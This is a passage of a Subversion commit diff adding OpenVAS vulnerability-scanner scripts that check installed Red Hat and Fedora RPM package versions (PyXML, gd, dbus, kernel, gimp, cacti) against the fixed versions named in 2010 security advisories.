scripts/gb_mandriva_MDVSA_2009_316_1.nasl, + scripts/gb_fedora_2009_13539_krb5_fc12.nasl, + scripts/gb_fedora_2009_13157_automake_fc12.nasl, + scripts/gb_mandriva_MDVA_2010_018.nasl, + scripts/gb_fedora_2009_13552_slim_fc12.nasl, + scripts/gb_fedora_2010_0227_condor_fc11.nasl, + scripts/gb_mandriva_MDVA_2010_008.nasl, + scripts/gb_mandriva_MDVA_2010_015.nasl, + scripts/gb_mandriva_MDVSA_2010_001.nasl, + scripts/gb_ubuntu_USN_877_1.nasl, + scripts/gb_mandriva_MDVA_2010_005.nasl, + scripts/gb_fedora_2010_0228_pdns-recursor_fc12.nasl, + scripts/gb_mandriva_MDVA_2010_012.nasl, + scripts/gb_RHSA-2010_0002-01_PyXML.nasl, + scripts/gb_mandriva_MDVA_2010_002.nasl, + scripts/gb_mandriva_MDVSA_2009_316_3.nasl, + scripts/gb_fedora_2010_0209_pdns-recursor_fc11.nasl, + scripts/gb_mandriva_MDVSA_2009_300_1.nasl, + scripts/gb_fedora_2009_11880_gimp_fc11.nasl, + scripts/gb_fedora_2009_12560_cacti_fc12.nasl, + scripts/gb_fedora_2010_0295_ImageMagick_fc11.nasl, + scripts/gb_mandriva_MDVA_2010_017.nasl, + scripts/gb_mandriva_MDVSA_2009_241_1.nasl, + scripts/gb_mandriva_MDVA_2010_007.nasl, + scripts/gb_ubuntu_USN_878_1.nasl, + scripts/gb_mandriva_MDVA_2010_014.nasl, + scripts/gb_mandriva_MDVSA_2010_000.nasl, + scripts/gb_mandriva_MDVA_2010_004.nasl, + scripts/gb_mandriva_MDVSA_2009_220_1.nasl, + scripts/gb_fedora_2009_13642_NetworkManager_fc11.nasl, + scripts/gb_mandriva_MDVA_2010_011.nasl, + scripts/gb_ubuntu_USN_880_1.nasl, + scripts/gb_mandriva_MDVA_2010_001.nasl, + scripts/gb_mandriva_MDVSA_2009_316_2.nasl, + scripts/gb_fedora_2010_0012_stardict_fc12.nasl, + scripts/gb_RHSA-2010_0019-01_kernel.nasl, + scripts/gb_mandriva_MDVA_2010_009.nasl, + scripts/gb_mandriva_MDVA_2010_016.nasl, + scripts/gb_mandriva_MDVSA_2010_002.nasl, + scripts/gb_ubuntu_USN_879_1.nasl, + scripts/gb_mandriva_MDVA_2010_006.nasl, + scripts/gb_fedora_2009_13551_slim_fc11.nasl, + scripts/gb_ubuntu_USN_876_1.nasl, + scripts/gb_mandriva_MDVSA_2009_227_1.nasl, + scripts/gb_mandriva_MDVA_2010_013.nasl, + scripts/gb_RHSA-2010_0020-01_kernel.nasl, + scripts/gb_RHSA-2010_0003-01_gd.nasl, + scripts/gb_mandriva_MDVSA_2009_293_1.nasl, + scripts/gb_mandriva_MDVA_2010_003.nasl, + scripts/gb_mandriva_MDVSA_2009_300_2.nasl, + scripts/gb_mandriva_MDVA_2010_010.nasl, + scripts/gb_suse_2010_001.nasl, + scripts/gb_fedora_2010_0213_condor_fc12.nasl, + scripts/gb_RHSA-2010_0018-01_dbus.nasl: + Added Local Security Checks. + 2010-01-14 Michael Meyer * scripts/lighttpd_31600.nasl, Added: trunk/openvas-plugins/scripts/gb_RHSA-2010_0002-01_PyXML.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_RHSA-2010_0002-01_PyXML.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_RHSA-2010_0002-01_PyXML.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,123 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# RedHat Update for PyXML RHSA-2010:0002-01 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(870202); + script_version("$Revision$: 1.0"); + script_xref(name: "RHSA", value: "2010:0002-01"); + script_cve_id("CVE-2009-3720"); + script_name("RedHat Update for PyXML RHSA-2010:0002-01"); + desc = " + + Vulnerability Insight: + PyXML provides XML libraries for Python. The distribution contains a + validating XML parser, an implementation of the SAX and DOM programming + interfaces, and an interface to the Expat parser. + + A buffer over-read flaw was found in the way PyXML's Expat parser handled + malformed UTF-8 sequences when processing XML files. A specially-crafted + XML file could cause Python applications using PyXML's Expat parser to + crash while parsing the file. (CVE-2009-3720) + + This update makes PyXML use the system Expat library rather than its own + internal copy; therefore, users must install the RHSA-2009:1625 expat + update together with this PyXML update to resolve the CVE-2009-3720 issue. + + All PyXML users should upgrade to this updated package, which changes PyXML + to use the system Expat library. After installing this update along with + RHSA-2009:1625, applications using the PyXML library must be restarted for + the update to take effect. + + + Affected Software/OS: + PyXML on Red Hat Enterprise Linux (v. 5 server), + Red Hat Enterprise Linux AS version 4, + Red Hat Enterprise Linux ES version 4, + Red Hat Enterprise Linux WS version 4 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/rhsa-announce/2010-January/msg00000.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of PyXML"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "RHENT_5") +{ + + if(isrpmvuln(pkg:"PyXML", rpm:"PyXML~0.8.4~4.el5_4.2", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"PyXML-debuginfo", rpm:"PyXML-debuginfo~0.8.4~4.el5_4.2", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + exit(0); +} + + +if(release == "RHENT_4") +{ + + if(isrpmvuln(pkg:"PyXML", rpm:"PyXML~0.8.3~6.el4_8.2", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"PyXML-debuginfo", rpm:"PyXML-debuginfo~0.8.3~6.el4_8.2", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_RHSA-2010_0002-01_PyXML.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_RHSA-2010_0003-01_gd.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_RHSA-2010_0003-01_gd.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_RHSA-2010_0003-01_gd.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,140 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# RedHat Update for gd RHSA-2010:0003-01 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(870204); + script_version("$Revision$: 1.0"); + script_xref(name: "RHSA", value: "2010:0003-01"); + script_cve_id("CVE-2009-3546"); + script_name("RedHat Update for gd RHSA-2010:0003-01"); + desc = " + + Vulnerability Insight: + The gd packages provide a graphics library used for the dynamic creation of + images, such as PNG and JPEG. + + A missing input sanitization flaw, leading to a buffer overflow, was + discovered in the gd library. A specially-crafted GD image file could cause + an application using the gd library to crash or, possibly, execute + arbitrary code when opened. (CVE-2009-3546) + + Users of gd should upgrade to these updated packages, which contain a + backported patch to resolve this issue. + + + Affected Software/OS: + gd on Red Hat Enterprise Linux (v. 5 server), + Red Hat Enterprise Linux AS version 4, + Red Hat Enterprise Linux ES version 4, + Red Hat Enterprise Linux WS version 4 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/rhsa-announce/2010-January/msg00001.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of gd"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "RHENT_5") +{ + + if(isrpmvuln(pkg:"gd", rpm:"gd~2.0.33~9.4.el5_4.2", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"gd-debuginfo", rpm:"gd-debuginfo~2.0.33~9.4.el5_4.2", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"gd-devel", rpm:"gd-devel~2.0.33~9.4.el5_4.2", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"gd-progs", rpm:"gd-progs~2.0.33~9.4.el5_4.2", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + exit(0); +} + + +if(release == "RHENT_4") +{ + + if(isrpmvuln(pkg:"gd", rpm:"gd~2.0.28~5.4E.el4_8.1", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"gd-debuginfo", rpm:"gd-debuginfo~2.0.28~5.4E.el4_8.1", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"gd-devel", rpm:"gd-devel~2.0.28~5.4E.el4_8.1", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"gd-progs", rpm:"gd-progs~2.0.28~5.4E.el4_8.1", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_RHSA-2010_0003-01_gd.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_RHSA-2010_0018-01_dbus.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_RHSA-2010_0018-01_dbus.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_RHSA-2010_0018-01_dbus.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,121 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# RedHat Update for dbus RHSA-2010:0018-01 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(870201); + script_version("$Revision$: 1.0"); + script_xref(name: "RHSA", value: "2010:0018-01"); + script_cve_id("CVE-2009-1189", "CVE-2008-3834"); + script_name("RedHat Update for dbus RHSA-2010:0018-01"); + desc = " + + Vulnerability Insight: + D-Bus is a system for sending messages between applications. It is used for + the system-wide message bus service and as a per-user-login-session + messaging facility. + + It was discovered that the Red Hat Security Advisory RHSA-2009:0008 did + not correctly fix the denial of service flaw in the system for sending + messages between applications. A local user could use this flaw to send a + message with a malformed signature to the bus, causing the bus (and, + consequently, any process using libdbus to receive messages) to abort. + (CVE-2009-1189) + + Note: Users running any application providing services over the system + message bus are advised to test this update carefully before deploying it + in production environments. + + All users are advised to upgrade to these updated packages, which contain a + backported patch to correct this issue. For the update to take effect, all + running instances of dbus-daemon and all running applications using the + libdbus library must be restarted, or the system rebooted. + + + Affected Software/OS: + dbus on Red Hat Enterprise Linux (v. 5 server) + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/rhsa-announce/2010-January/msg00003.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of dbus"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "RHENT_5") +{ + + if(isrpmvuln(pkg:"dbus", rpm:"dbus~1.1.2~12.el5_4.1", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"dbus-debuginfo", rpm:"dbus-debuginfo~1.1.2~12.el5_4.1", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"dbus-devel", rpm:"dbus-devel~1.1.2~12.el5_4.1", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"dbus-libs", rpm:"dbus-libs~1.1.2~12.el5_4.1", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"dbus-x11", rpm:"dbus-x11~1.1.2~12.el5_4.1", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_RHSA-2010_0018-01_dbus.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_RHSA-2010_0019-01_kernel.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_RHSA-2010_0019-01_kernel.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_RHSA-2010_0019-01_kernel.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,187 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# RedHat Update for kernel RHSA-2010:0019-01 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(870203); + script_version("$Revision$: 1.0"); + script_xref(name: "RHSA", value: "2010:0019-01"); + script_cve_id("CVE-2007-4567", "CVE-2009-4536", "CVE-2009-4537", "CVE-2009-4538"); + script_name("RedHat Update for kernel RHSA-2010:0019-01"); + desc = " + + Vulnerability Insight: + The kernel packages contain the Linux kernel, the core of any Linux + operating system. + + This update fixes the following security issues: + + * a flaw was found in the IPv6 Extension Header (EH) handling + implementation in the Linux kernel. The skb->dst data structure was not + properly validated in the ipv6_hop_jumbo() function. This could possibly + lead to a remote denial of service. (CVE-2007-4567, Important) + + * a flaw was found in each of the following Intel PRO/1000 Linux drivers in + the Linux kernel: e1000 and e1000e. A remote attacker using packets larger + than the MTU could bypass the existing fragment check, resulting in + partial, invalid frames being passed to the network stack. These flaws + could also possibly be used to trigger a remote denial of service. + (CVE-2009-4536, CVE-2009-4538, Important) + + * a flaw was found in the Realtek r8169 Ethernet driver in the Linux + kernel. Receiving overly-long frames with network cards supported by this + driver could possibly result in a remote denial of service. (CVE-2009-4537, + Important) + + Users should upgrade to these updated packages, which contain backported + patches to correct these issues. The system must be rebooted for this + update to take effect. + + + Affected Software/OS: + kernel on Red Hat Enterprise Linux (v. 5 server) + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/rhsa-announce/2010-January/msg00004.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of kernel"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "RHENT_5") +{ + + if(isrpmvuln(pkg:"kernel", rpm:"kernel~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-PAE", rpm:"kernel-PAE~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-PAE-debuginfo", rpm:"kernel-PAE-debuginfo~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-PAE-devel", rpm:"kernel-PAE-devel~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-debug", rpm:"kernel-debug~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-debug-debuginfo", rpm:"kernel-debug-debuginfo~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-debug-devel", rpm:"kernel-debug-devel~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-debuginfo", rpm:"kernel-debuginfo~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-debuginfo-common", rpm:"kernel-debuginfo-common~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-headers", rpm:"kernel-headers~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-xen", rpm:"kernel-xen~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-xen-debuginfo", rpm:"kernel-xen-debuginfo~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-xen-devel", rpm:"kernel-xen-devel~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-doc", rpm:"kernel-doc~2.6.18~164.10.1.el5", rls:"RHENT_5")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_RHSA-2010_0019-01_kernel.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_RHSA-2010_0020-01_kernel.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_RHSA-2010_0020-01_kernel.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_RHSA-2010_0020-01_kernel.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,166 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# RedHat Update for kernel RHSA-2010:0020-01 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(870200); + script_version("$Revision$: 1.0"); + script_xref(name: "RHSA", value: "2010:0020-01"); + script_cve_id("CVE-2009-4536", "CVE-2009-4537", "CVE-2009-4538"); + script_name("RedHat Update for kernel RHSA-2010:0020-01"); + desc = " + + Vulnerability Insight: + The kernel packages contain the Linux kernel, the core of any Linux + operating system. + + This update fixes the following security issues: + + * a flaw was found in each of the following Intel PRO/1000 Linux drivers in + the Linux kernel: e1000 and e1000e. A remote attacker using packets larger + than the MTU could bypass the existing fragment check, resulting in + partial, invalid frames being passed to the network stack. These flaws + could also possibly be used to trigger a remote denial of service. + (CVE-2009-4536, CVE-2009-4538, Important) + + * a flaw was found in the Realtek r8169 Ethernet driver in the Linux + kernel. Receiving overly-long frames with network cards supported by this + driver could possibly result in a remote denial of service. (CVE-2009-4537, + Important) + + Users should upgrade to these updated packages, which contain backported + patches to correct these issues. The system must be rebooted for this + update to take effect. + + + Affected Software/OS: + kernel on Red Hat Enterprise Linux AS version 4, + Red Hat Enterprise Linux ES version 4, + Red Hat Enterprise Linux WS version 4 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/rhsa-announce/2010-January/msg00005.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of kernel"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Red Hat Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "RHENT_4") +{ + + if(isrpmvuln(pkg:"kernel", rpm:"kernel~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-debuginfo", rpm:"kernel-debuginfo~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-devel", rpm:"kernel-devel~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-hugemem", rpm:"kernel-hugemem~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-hugemem-devel", rpm:"kernel-hugemem-devel~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-smp", rpm:"kernel-smp~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-smp-devel", rpm:"kernel-smp-devel~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-xenU", rpm:"kernel-xenU~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-xenU-devel", rpm:"kernel-xenU-devel~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-doc", rpm:"kernel-doc~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-largesmp", rpm:"kernel-largesmp~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + if(isrpmvuln(pkg:"kernel-largesmp-devel", rpm:"kernel-largesmp-devel~2.6.9~89.0.19.EL", rls:"RHENT_4")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_RHSA-2010_0020-01_kernel.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_fedora_2009_11880_gimp_fc11.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_fedora_2009_11880_gimp_fc11.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_fedora_2009_11880_gimp_fc11.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,84 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# Fedora Update for gimp FEDORA-2009-11880 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(861608); + script_version("$Revision$: 1.0"); + script_xref(name: "FEDORA", value: "2009-11880"); + script_name("Fedora Update for gimp FEDORA-2009-11880"); + desc = " + + Vulnerability Insight: + GIMP (GNU Image Manipulation Program) is a powerful image composition and + editing program, which can be extremely useful for creating logos and other + graphics for webpages. GIMP has many of the tools and filters you would expect + to find in similar commercial offerings, and some interesting extras as well. + GIMP provides a large image manipulation toolbox, including channel operations + and layers, effects, sub-pixel imaging and anti-aliasing, and conversions, all + with multi-level undo. + + + Affected Software/OS: + gimp on Fedora 11 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00184.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of gimp"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = get_kb_item("ssh/login/release"); + +if(release == NULL){ + exit(0); +} + +if(release == "FC11") +{ + + if(isrpmvuln(pkg:"gimp", rpm:"gimp~2.6.8~1.fc11", rls:"FC11")) + { + security_hole(0); + exit(0); + } + + exit(0); +} \ No newline at end of file Property changes on: trunk/openvas-plugins/scripts/gb_fedora_2009_11880_gimp_fc11.nasl ___________________________________________________________________ Name: svn:keywords + Revision Added: trunk/openvas-plugins/scripts/gb_fedora_2009_12560_cacti_fc12.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_fedora_2009_12560_cacti_fc12.nasl 2010-01-14 20:48:11 UTC (rev 6413) +++ trunk/openvas-plugins/scripts/gb_fedora_2009_12560_cacti_fc12.nasl 2010-01-15 09:29:41 UTC (rev 6414) @@ -0,0 +1,85 @@ +############################################################################### +# OpenVAS Vulnerability Test +# +# Fedora Update for cacti FEDORA-2009-12560 +# +# Authors: +# System Generated Check +# +# Copyright: +# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(861611); + script_version("$Revision$: 1.0"); + script_xref(name: "FEDORA", value: "2009-12560"); + script_cve_id("CVE-2009-4032"); + script_name("Fedora Update for cacti FEDORA-2009-12560"); + desc = " + + Vulnerability Insight: + Cacti is a complete frontend to RRDTool. It stores all of the + necessary information to create graphs and populate them with + data in a MySQL database. The frontend is completely PHP + driven. Along with being able to maintain graphs, data + sources, and round robin archives in a database, Cacti also + handles the data gathering. There is SNMP support for those + used to creating traffic graphs with MRTG. + + + Affected Software/OS: + cacti on Fedora 12 + + Fix: Please Install the Updated Packages. + + References: + https://www.redhat.com/archives/fedora-package-announce/2010-January/msg00166.html + + Risk factor: High"; + + script_description(desc); + script_summary("Check for the Version of cacti"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (c) 2010 Greenbone Networks GmbH"); + script_family("Fedora Local Security Checks"); + script_dependencies("gather-package-list.nasl"); + script_require_keys("ssh/login/release"); + exit(0); +} + + +include("pkg-lib-rpm.inc"); +include("revisions-lib.inc"); + +release = 